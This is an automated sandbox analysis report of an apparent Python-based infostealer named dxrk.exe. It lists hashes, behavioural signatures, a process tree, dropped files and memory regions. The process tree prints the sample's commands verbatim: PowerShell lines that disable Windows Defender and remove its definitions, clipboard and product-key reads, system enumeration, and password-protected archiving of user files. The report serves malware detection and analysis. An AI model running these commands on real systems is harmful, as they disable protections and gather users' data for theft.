Analysis
- max time kernel: 445s
- max time network: 1169s
- platform: windows11-21h2_x64
- resource: win11-20240426-en
- resource tags: arch:x64, arch:x86, image:win11-20240426-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 01-06-2024 19:29
General
- Target: dxrk.exe
- Size: 6.9MB
- MD5: 0438f9feb601e4d2a3fb2687b160b90a
- SHA1: f37a4db22d9b58844fc0fc1753e0201861267f21
- SHA256: 45aba51b06cd23a18801950943cf12bd32c9ee8f3d8cd804a9802513f879a473
- SHA512: e406b95a411579685fdf336aeb14ed3bfd85328f76d3d34924fca8a76e69aa3e637c2d5574a1206b349cffda3058ee350ee4abbd3ef5c09d7f7e488c5535c0fd
- SSDEEP: 98304:vrUcDjWM8JEE1rytamaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRGYKJJcGhEY:vrUc0peNTfm/pf+xk4dWRGtrbWOjgWyK
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
- Executes dropped EXE (1 IoC)
  Processes: rar.exe (PID 2848)
- Loads dropped DLL (17 IoCs)
  Processes: dxrk.exe (PID 4496), 17 DLL loads
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- YARA rule upx
  Matches on the dropped Python runtime files under C:\Users\Admin\AppData\Local\Temp\_MEI17882\ (python311.dll, the .pyd extension modules, libssl-1_1.dll, libcrypto-1_1.dll, sqlite3.dll, libffi-8.dll) and on memory regions of PID 4496.
- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
- Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Network flow: ip-api.com
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Detects videocard installed (1 TTP, 3 IoCs)
  Uses WMIC.exe to determine the videocard installed.
  Processes: WMIC.exe (PIDs 844, 3668, 5016)
- Enumerates processes with tasklist (1 TTP, 4 IoCs)
  Processes: tasklist.exe (PIDs 3772, 764, 2548, 1992)
- Gathers system information (1 TTP, 1 IoC)
  Runs systeminfo.exe.
- Suspicious behavior: EnumeratesProcesses (10 IoCs)
  Processes: powershell.exe (PIDs 2320, 424, 2624, 3012, 3372)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes: tasklist.exe (PID 2548) and powershell.exe (PIDs 2320, 424) enable SeDebugPrivilege; WMIC.exe (PIDs 4932, 3668) enables its full set of token privileges (SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege and privileges 33 to 36), which is the normal behaviour of the WMIC client.
- Suspicious use of WriteProcessMemory (64 IoCs)
  Parent-to-child writes at process creation: dxrk.exe (PID 1788) into dxrk.exe (PID 4496); dxrk.exe (PID 4496) into each cmd.exe it spawns; each cmd.exe into its own child (powershell.exe, tasklist.exe, WMIC.exe, reg.exe, tree.com, systeminfo.exe). The full parent/child layout is given in the process tree below.
Processes
Image paths: cmd.exe = C:\Windows\system32\cmd.exe; powershell.exe = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; tasklist.exe = C:\Windows\system32\tasklist.exe; WMIC.exe = C:\Windows\System32\Wbem\WMIC.exe; reg.exe = C:\Windows\system32\reg.exe; tree.com = C:\Windows\system32\tree.com; systeminfo.exe = C:\Windows\system32\systeminfo.exe; getmac.exe = C:\Windows\system32\getmac.exe; rar.exe = C:\Users\Admin\AppData\Local\Temp\_MEI17882\rar.exe.

- dxrk.exe (PID 1788): "C:\Users\Admin\AppData\Local\Temp\dxrk.exe"
  signatures: Suspicious use of WriteProcessMemory
  - dxrk.exe (PID 4496): "C:\Users\Admin\AppData\Local\Temp\dxrk.exe"
    signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
    - cmd.exe (PID 4832): C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dxrk.exe'"
      signatures: Suspicious use of WriteProcessMemory
      - powershell.exe (PID 424): powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dxrk.exe'
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - cmd.exe (PID 3396): C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      signatures: Suspicious use of WriteProcessMemory
      - powershell.exe (PID 2320): powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - cmd.exe (PID 408): C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      signatures: Suspicious use of WriteProcessMemory
      - tasklist.exe (PID 2548): tasklist /FO LIST
        signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
    - cmd.exe (PID 3588): C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      signatures: Suspicious use of WriteProcessMemory
      - WMIC.exe (PID 4932): wmic csproduct get uuid
        signatures: Suspicious use of AdjustPrivilegeToken
    - cmd.exe (PID 3580): C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
      signatures: Suspicious use of WriteProcessMemory
      - reg.exe (PID 1680): REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
    - cmd.exe (PID 4900): C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
      signatures: Suspicious use of WriteProcessMemory
      - reg.exe (PID 944): REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
    - cmd.exe (PID 4564): C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      signatures: Suspicious use of WriteProcessMemory
      - WMIC.exe (PID 3668): wmic path win32_VideoController get name
        signatures: Detects videocard installed; Suspicious use of AdjustPrivilegeToken
    - cmd.exe (PID 3548): C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      signatures: Suspicious use of WriteProcessMemory
      - WMIC.exe (PID 5016): wmic path win32_VideoController get name
        signatures: Detects videocard installed
    - cmd.exe (PID 4412): C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      signatures: Suspicious use of WriteProcessMemory
      - tasklist.exe (PID 1992): tasklist /FO LIST
        signatures: Enumerates processes with tasklist
    - cmd.exe (PID 3644): C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      signatures: Suspicious use of WriteProcessMemory
      - tasklist.exe (PID 3772): tasklist /FO LIST
        signatures: Enumerates processes with tasklist
    - cmd.exe (PID 3592): C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      signatures: Suspicious use of WriteProcessMemory
      - WMIC.exe (PID 1008): WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
    - cmd.exe (PID 1800): C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      signatures: Suspicious use of WriteProcessMemory
      - powershell.exe (PID 2624): powershell Get-Clipboard
        signatures: Suspicious behavior: EnumeratesProcesses
    - cmd.exe (PID 4376): C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      signatures: Suspicious use of WriteProcessMemory
      - tasklist.exe (PID 764): tasklist /FO LIST
        signatures: Enumerates processes with tasklist
    - cmd.exe (PID 3008): C:\Windows\system32\cmd.exe /c "tree /A /F"
      signatures: Suspicious use of WriteProcessMemory
      - tree.com (PID 1264): tree /A /F
    - cmd.exe (PID 1192): C:\Windows\system32\cmd.exe /c "systeminfo"
      signatures: Suspicious use of WriteProcessMemory
      - systeminfo.exe (PID 4824): systeminfo
        signatures: Gathers system information
    - cmd.exe (PID 4640): C:\Windows\system32\cmd.exe /c "tree /A /F"
      - tree.com (PID 980): tree /A /F
    - cmd.exe (PID 4140): C:\Windows\system32\cmd.exe /c "tree /A /F"
      - tree.com (PID 2896): tree /A /F
    - cmd.exe (PID 4784): C:\Windows\system32\cmd.exe /c "tree /A /F"
      - tree.com (PID 1940): tree /A /F
    - cmd.exe (PID 4072): C:\Windows\system32\cmd.exe /c "tree /A /F"
      - tree.com (PID 2316): tree /A /F
    - cmd.exe (PID 736): C:\Windows\system32\cmd.exe /c "tree /A /F"
      - tree.com (PID 4340): tree /A /F
    - cmd.exe (PID 1640): C:\Windows\system32\cmd.exe /c "getmac"
      - getmac.exe (PID 1872): getmac
    - cmd.exe (PID 452): C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"ud" "C:\Users\Admin\AppData\Local\Temp\GXax3.zip" *"
      - rar.exe (PID 2848): C:\Users\Admin\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"ud" "C:\Users\Admin\AppData\Local\Temp\GXax3.zip" *
        signatures: Executes dropped EXE
    - cmd.exe (PID 4068): C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      - WMIC.exe (PID 4700): wmic os get Caption
    - cmd.exe (PID 4912): C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      - WMIC.exe (PID 1824): wmic computersystem get totalphysicalmemory
    - cmd.exe (PID 2116): C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      - WMIC.exe (PID 4364): wmic csproduct get uuid
    - cmd.exe (PID 228): C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      - powershell.exe (PID 3012): powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        signatures: Suspicious behavior: EnumeratesProcesses
    - cmd.exe (PID 3936): C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      - WMIC.exe (PID 844): wmic path win32_VideoController get name
        signatures: Detects videocard installed
    - cmd.exe (PID 2844): C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      - powershell.exe (PID 3372): powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        signatures: Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v15
Downloads (dropped files: a PyInstaller onefile runtime extracted to C:\Users\Admin\AppData\Local\Temp\_MEI17882\, including python311.dll, base_library.zip, the Python extension modules, rar.exe with rarreg.key and blank.aes; PowerShell usage logs under C:\Users\Admin\AppData\Local\Microsoft\; and files staged under C:\Users\Admin\AppData\Local\Temp\          \Common Files\ in Desktop, Documents and Downloads subfolders)
208KB
MD521ac46d5c7f09dad53d808741a94a733
SHA11bb595758f4af12f6c649f9c8bff67911f1f4a84
SHA256e344bcf8be3fe55a21d0049132d305cc1e6d6588403cc931a25082cd724a3f97
SHA51287576c2dcdb0354fa0bfc61a4f9ad5c29be5a71633656f84d5a9ac3cac614b98798b133d82a86a36a7f1abe8240eccbfd891c57de2c4af3d65d2dbd15350e3ae
-
C:\Users\Admin\AppData\Local\Temp\          \Common Files\Downloads\WriteAdd.docxFilesize
356KB
MD5cc902c6df654066571f84aeb54e84de5
SHA1e67c36be6727a503672ba7eec9d01b227bceb57e
SHA25686a946d34461d36171a433b8b5a9581a15ec2e9ec42dc885f5856b4dd673f157
SHA512828f85b36bd66df183c843f9d98bebd06f555fe3ecbe4d1dcf405a319ede15544a8cb6a62983e087cfa0750b95e55e762106004f8b2098fc93642f4ee808a353
-
C:\Users\Admin\AppData\Local\Temp\          \Common Files\Music\DenyExpand.csvFilesize
1.5MB
MD5db460ea5282dc0fc31e8ef47a255a100
SHA1753d816b66c905e375cc8c8db7bc37b46185bbdb
SHA256926da6ba3bfcdd2e4d4906f51711880819fc4e322a5f673a6008c270342042ca
SHA512f8574d012c8af1daa9acd86b2f6caaa39bf2833315cfbf36b5b0062728af8ed91c759cbc907840f1fd077b1fb5d7a8c6c1ca7c3c26881d55b15eb381aae7d8fb
-
C:\Users\Admin\AppData\Local\Temp\          \Common Files\Music\GetMeasure.txtFilesize
409KB
MD58739c062966dcbaa39e52a1bfc1b5df9
SHA1e85b71c843e76b7d0e4408094e23500c0e9e284e
SHA2562954fc1ad9873568cacf476555af95685ba51cc317f5956d5117151c5a15bde9
SHA5129fa0a3189bb6d32a255b6a6161ea41d7b60e1df100be44bfa7b4750f38530190ac18f415414999c7d2b55c9f933b67c2204c8a71c743b72030c1459271548d1a
-
C:\Users\Admin\AppData\Local\Temp\          \Common Files\Music\MoveConvertFrom.mp3Filesize
518KB
MD5bed2702489ddfc62b251f026fd224481
SHA1dbaaeddae1fee2db5b8945dd1c2c8a23d03ee482
SHA256e19edf8b49bffc933fa8d17a2900c333b68fe4475ebdd6b792046b40920093fe
SHA51283a611a69bb6bd129ec58c187da87784003e172e93d9f7891c9e7c996f1630252e8f7661db4ed4bc04e6d46a3304ccb7283d47fd0440015c5eb2b5f0dc357fc8
-
C:\Users\Admin\AppData\Local\Temp\          \Common Files\Pictures\AddCompare.jpegFilesize
195KB
MD537b976b63bb41ca2dd5088ddc57db96b
SHA1ffd72101f56232484a4b45591875aa7258c3e64e
SHA256bfe07dcefd8dbeeb4d69242c5b2b52137f54e08bdf9e70766f7f4e926520bd54
SHA512b28adc73549574b4255f9daf77e3a8cc12aa5201a7626a53c7cf0f0fb72a309648a48170698d5b6331c848fafbc8495bbdff6cbf8e6a5ba1687eb08525093371
-
C:\Users\Admin\AppData\Local\Temp\          \Common Files\Pictures\CopyUnblock.jpgFilesize
406KB
MD514db28371e6846895b38692f8207972a
SHA1c9b13c6f4cf9adcef0247e4d2b01cb34d2ebcfeb
SHA25634c369bce8b207f6230b403b5c91fbc371b0c4b74eeb13537f2f919de5b29804
SHA5123071f3a4a40709208941e84fc7d7806115b1a163122e87c025505120cae8ec0436980b04123dbf95ac51455d9ad5d00e5e377f7ba6ff6143461e6258dbf6d24c
-
C:\Users\Admin\AppData\Local\Temp\          \Common Files\Pictures\DismountSplit.jpegFilesize
336KB
MD58dfb697c8e0a54d529c143c6a8512ed2
SHA1a3eca6da56ae258753c02e36df2150aa0b6f1296
SHA256863f95ddca65bb56b40312c091afd4f69924ded5b4808128475993de9be70244
SHA5124ec9fa0b682dd0fe76dbfb5d4a8f3cbb76e700445370f9ad6cb8a721a5e31dc5ff2654a3ee4c21f51cc903fc51e8cb352f084e828c37c8107b2ecaca03451f81
-
C:\Users\Admin\AppData\Local\Temp\          \Common Files\Pictures\My Wallpaper.jpgFilesize
24KB
MD5a51464e41d75b2aa2b00ca31ea2ce7eb
SHA15b94362ac6a23c5aba706e8bfd11a5d8bab6097d
SHA25616d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f
SHA512b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff
-
C:\Users\Admin\AppData\Local\Temp\          \Common Files\Pictures\RepairUnregister.jpgFilesize
396KB
MD5288ef9bc0f3de7bb38545634a58378cd
SHA1ccf2e127a786f84eeaba0882fa96a1cbddde8975
SHA256fda7ebfbdd5466a132c0fa8c6ae79479001bd846b589b7861428862d96e33d5d
SHA5124441d660d427df3ec0d731a67f034a33269deddb38f720cc6f778ed096ab44ac2f0c8eedcf947a6cbf053aa2fedf1a0cf4a92edb3f4e9419539669b4455894cc
-
C:\Users\Admin\AppData\Local\Temp\          \Common Files\Pictures\UnlockRedo.pngFilesize
386KB
MD54c92cdd3b6609edce685e2116c913837
SHA1697d38f1d0cd96dfb7fd8b62675e2dc1098dab59
SHA256f2dc7f98ce90f2de3875e240c964a4aa6be0148c2c8341ae878b202d6ff2a4c4
SHA512f8c90b7ea6194de85fed8596ed774aaac989004ece70b969275257373163655989b7829775b93d6ed981bb92d70cc3bf201f23a96a089229b4a7de9a9e5de827
-
C:\Users\Admin\AppData\Local\Temp\          \Common Files\Pictures\UnlockSwitch.pngFilesize
235KB
MD52831cea32e8827feb72b35aa230b009e
SHA1392f7d37b62c5c4e562eef99d5b4c79aee5ba9c1
SHA2566a57dd507c0a482d6d9c236ec1d80c7915170fbbfe6fb92944399551830e4c9a
SHA51291f210af782d037a752ece5bf7ddb7082f01cb3683d30cd6ff37619651af7fa55a8ebff802f9f639363ce1626134a9ba01cb391b66d5c197e5709647cb7a90b2
-
C:\Users\Admin\AppData\Local\Temp\          \Common Files\Pictures\UnregisterWrite.jpgFilesize
506KB
MD592ef67a82c87c36a807e3f215b388a42
SHA1871f9f889d2ba98a8f1ea89b401cab3433046427
SHA25687223e89a8950a6b3792433260764c7631635118b82ad2c21127e01f152f442f
SHA5120b7c616f57965369fb9faf576b7c83a8830d259beb52a0c1c72c80ad8d64bada9fe05d0a744730e8cda7e5e36d552480e9fc2e06f2a8a14a51991ad2eb3514f8
-
memory/2320-96-0x000001A5BFC40000-0x000001A5BFC62000-memory.dmpFilesize
136KB
-
memory/4496-48-0x00007FFBEE1E0000-0x00007FFBEE1EF000-memory.dmpFilesize
60KB
-
memory/4496-194-0x00007FFBEBCA0000-0x00007FFBEBCC4000-memory.dmpFilesize
144KB
-
memory/4496-76-0x00007FFBE7E30000-0x00007FFBE8418000-memory.dmpFilesize
5.9MB
-
memory/4496-77-0x00007FFBE88B0000-0x00007FFBE88C4000-memory.dmpFilesize
80KB
-
memory/4496-78-0x00007FFBE7C50000-0x00007FFBE7D6C000-memory.dmpFilesize
1.1MB
-
memory/4496-79-0x00007FFBECDD0000-0x00007FFBECDDD000-memory.dmpFilesize
52KB
-
memory/4496-71-0x00007FFBD72E0000-0x00007FFBD7655000-memory.dmpFilesize
3.5MB
-
memory/4496-72-0x0000025EF5E40000-0x0000025EF61B5000-memory.dmpFilesize
3.5MB
-
memory/4496-70-0x00007FFBE7D70000-0x00007FFBE7E28000-memory.dmpFilesize
736KB
-
memory/4496-66-0x00007FFBE8990000-0x00007FFBE89BE000-memory.dmpFilesize
184KB
-
memory/4496-63-0x00007FFBECCE0000-0x00007FFBECCF9000-memory.dmpFilesize
100KB
-
memory/4496-64-0x00007FFBEE1D0000-0x00007FFBEE1DD000-memory.dmpFilesize
52KB
-
memory/4496-60-0x00007FFBE86B0000-0x00007FFBE8823000-memory.dmpFilesize
1.4MB
-
memory/4496-57-0x00007FFBEE110000-0x00007FFBEE129000-memory.dmpFilesize
100KB
-
memory/4496-58-0x00007FFBEBC40000-0x00007FFBEBC63000-memory.dmpFilesize
140KB
-
memory/4496-54-0x00007FFBEBC70000-0x00007FFBEBC9D000-memory.dmpFilesize
180KB
-
memory/4496-47-0x00007FFBEBCA0000-0x00007FFBEBCC4000-memory.dmpFilesize
144KB
-
memory/4496-25-0x00007FFBE7E30000-0x00007FFBE8418000-memory.dmpFilesize
5.9MB
-
memory/4496-246-0x00007FFBE86B0000-0x00007FFBE8823000-memory.dmpFilesize
1.4MB
-
memory/4496-255-0x00007FFBEBC40000-0x00007FFBEBC63000-memory.dmpFilesize
140KB
-
memory/4496-254-0x00007FFBE7C50000-0x00007FFBE7D6C000-memory.dmpFilesize
1.1MB
-
memory/4496-251-0x00007FFBD72E0000-0x00007FFBD7655000-memory.dmpFilesize
3.5MB
-
memory/4496-250-0x00007FFBE7D70000-0x00007FFBE7E28000-memory.dmpFilesize
736KB
-
memory/4496-249-0x00007FFBE8990000-0x00007FFBE89BE000-memory.dmpFilesize
184KB
-
memory/4496-247-0x00007FFBECCE0000-0x00007FFBECCF9000-memory.dmpFilesize
100KB
-
memory/4496-240-0x00007FFBE7E30000-0x00007FFBE8418000-memory.dmpFilesize
5.9MB
-
memory/4496-241-0x00007FFBEBCA0000-0x00007FFBEBCC4000-memory.dmpFilesize
144KB
-
memory/4496-256-0x00007FFBE7E30000-0x00007FFBE8418000-memory.dmpFilesize
5.9MB
-
memory/4496-271-0x0000025EF5E40000-0x0000025EF61B5000-memory.dmpFilesize
3.5MB
-
memory/4496-272-0x00007FFBE7E30000-0x00007FFBE8418000-memory.dmpFilesize
5.9MB
-
memory/4496-292-0x00007FFBECDD0000-0x00007FFBECDDD000-memory.dmpFilesize
52KB
-
memory/4496-300-0x00007FFBE7C50000-0x00007FFBE7D6C000-memory.dmpFilesize
1.1MB
-
memory/4496-299-0x00007FFBE88B0000-0x00007FFBE88C4000-memory.dmpFilesize
80KB
-
memory/4496-298-0x00007FFBD72E0000-0x00007FFBD7655000-memory.dmpFilesize
3.5MB
-
memory/4496-297-0x00007FFBE7D70000-0x00007FFBE7E28000-memory.dmpFilesize
736KB
-
memory/4496-296-0x00007FFBE8990000-0x00007FFBE89BE000-memory.dmpFilesize
184KB
-
memory/4496-295-0x00007FFBEE1D0000-0x00007FFBEE1DD000-memory.dmpFilesize
52KB
-
memory/4496-294-0x00007FFBECCE0000-0x00007FFBECCF9000-memory.dmpFilesize
100KB
-
memory/4496-293-0x00007FFBE86B0000-0x00007FFBE8823000-memory.dmpFilesize
1.4MB
-
memory/4496-291-0x00007FFBEE110000-0x00007FFBEE129000-memory.dmpFilesize
100KB
-
memory/4496-290-0x00007FFBEBC70000-0x00007FFBEBC9D000-memory.dmpFilesize
180KB
-
memory/4496-289-0x00007FFBEE1E0000-0x00007FFBEE1EF000-memory.dmpFilesize
60KB
-
memory/4496-288-0x00007FFBEBCA0000-0x00007FFBEBCC4000-memory.dmpFilesize
144KB
-
memory/4496-287-0x00007FFBEBC40000-0x00007FFBEBC63000-memory.dmpFilesize
140KB